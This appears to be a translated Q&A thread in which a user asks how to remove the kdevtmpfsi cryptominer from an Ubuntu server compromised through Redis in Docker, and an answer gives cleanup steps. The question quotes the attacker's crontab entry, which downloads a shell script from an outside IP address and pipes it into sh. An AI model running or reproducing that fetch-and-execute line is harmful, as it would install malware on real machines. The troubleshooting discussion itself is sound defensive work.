我的 Ubuntu 服务器被 kdevtmpfsi 病毒感染

Question

我的 Ubuntu 服务器已经被病毒 kdevtmpfsi 感染，我已经做了几个步骤来解决这个问题，比如所有这些：https : //github.com/docker-library/redis/issues/217。

但是当带有 redis 的 docker 容器运行时，它仍然一次又一次地出现。

但是还有一件事我不能做，当我运行命令for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l; done查看所有用户 crontab 时，这是我的输出：

no crontab for gdm
fabio
* * * * * wget -q -O - http://195.3.146.118/unk.sh | sh > /dev/null 2>&1
debian-tor
no crontab for debian-tor
deploy
no crontab for deploy
redis
no crontab for redis

crontab 中有一个wget用于下载sh脚本的可疑作业，我找不到如何删除它，而且我不确定当我使用 redis 打开 docker 容器时这是否会再次出现。

看看上面的图片，运行这个病毒的“用户”是一个用户“999”我不知道这是怎么可能的，因为这个用户不存在。

我能做些什么来解决这个问题？

Answer 1

做一个

chmod 000 /tmp/kdevtmpfsi

第一的。这将终止对该文件的访问

如果可能，如果不是您的用户，则从用户提示中：

sudo -u fabio
crontab -l 

否则你只需要这 2 行的最后一行。如果它在那里

crontab -e

编辑和删除该行。如果不是 crontabs 存储在/var/spool/cron/crontabs/. 那里fabio会有。核爆这一切。

而且它不是病毒。它是您可能自己安装或作为某些软件的一部分安装的矿工。如果不认为您的服务器受到威胁，请格式化磁盘并恢复备份。如果你这样做了，请坚持使用常规和可信赖的来源。

编辑：找到了更多关于此的信息。

也与此有关：

/tmp/zzz  

那似乎是引导程序文件。chmod 那个，并在你确认你杀死它或它杀死了它之后用核武器杀死它。

chmod 删除权限，因此矿工无法重新创建文件，也无法写入或读取文件。有效地杀死它。然后开始搜索文件。Nuke /tmp/* /var/tmp/* 对于kinsing名称中包含的任何内容以及上面列出的文件。

尝试在 ONE 命令中执行删除，这样它就没有机会初始化自己。

github 上关于如何删除它的有趣主题。

它已记录在此处。众所周知，除非您自己设置了适当的保护，否则 Redis 很容易被破解。